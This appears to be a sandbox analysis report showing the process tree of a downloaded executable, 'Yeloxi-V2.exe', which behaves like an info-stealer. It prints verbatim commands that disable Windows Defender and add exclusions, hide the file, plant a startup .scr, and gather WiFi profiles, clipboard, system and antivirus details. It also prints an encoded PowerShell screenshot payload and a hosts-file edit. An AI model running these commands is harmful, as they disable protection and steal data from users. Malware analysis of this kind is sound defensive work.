"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6472 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
2⤵
PID:1208

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7468 /prefetch:1
2⤵
PID:3604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
2⤵
PID:1168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
2⤵
PID:1980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
2⤵
PID:2600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7744 /prefetch:1
2⤵
PID:392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7932 /prefetch:1
2⤵
PID:1364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7896 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
2⤵
PID:5740

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
2⤵
PID:5812

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
2⤵
PID:5820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7892 /prefetch:1
2⤵
PID:5140

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6524 /prefetch:1
2⤵
PID:5148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8260 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:5424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
2⤵
PID:4904

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2108

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4400

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004F0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4748

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6036

C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe
"C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe"
1⤵
PID:4064

C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe
"C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe"
2⤵
- Drops file in Drivers directory
- Loads dropped DLL
PID:608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe'"
3⤵
PID:3680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
3⤵
PID:996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('404', 0, 'Error', 0+16);close()""
3⤵
PID:1068

C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('404', 0, 'Error', 0+16);close()"
4⤵
PID:5192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:2116

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
PID:2912

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:6096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
3⤵
PID:2144

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
4⤵
PID:5704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
3⤵
PID:4760

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
4⤵
PID:1992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
PID:2428

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:5320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
PID:4948

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:5516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe""
3⤵
PID:3044

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\Downloads\Yeloxi-V2\Yeloxi-V2.exe"
4⤵
- Views/modifies file attributes
PID:2584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'"
3⤵
PID:3568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:6052

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:5968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:5128

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:5032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
3⤵
PID:2912

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
4⤵
PID:5860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
3⤵
PID:1688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:1852

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:5488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:5856

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:5632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
3⤵
PID:5844

C:\Windows\system32\netsh.exe
netsh wlan show profile
4⤵
PID:1160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
3⤵
PID:3880

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:6088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
3⤵
PID:5280

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
4⤵
PID:5588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
3⤵
PID:1492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5412

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tec5gjnb\tec5gjnb.cmdline"
5⤵
PID:4016

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2735.tmp" "c:\Users\Admin\AppData\Local\Temp\tec5gjnb\CSC9A30CDC2855944B19FB6E789BBD084DC.TMP"
6⤵
PID:1892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:5504

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:5088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
3⤵
PID:5980

C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
3⤵
PID:912

C:\Windows\system32\tree.com
tree /A /F
4⤵
PID:2832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
3⤵
PID:6096

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
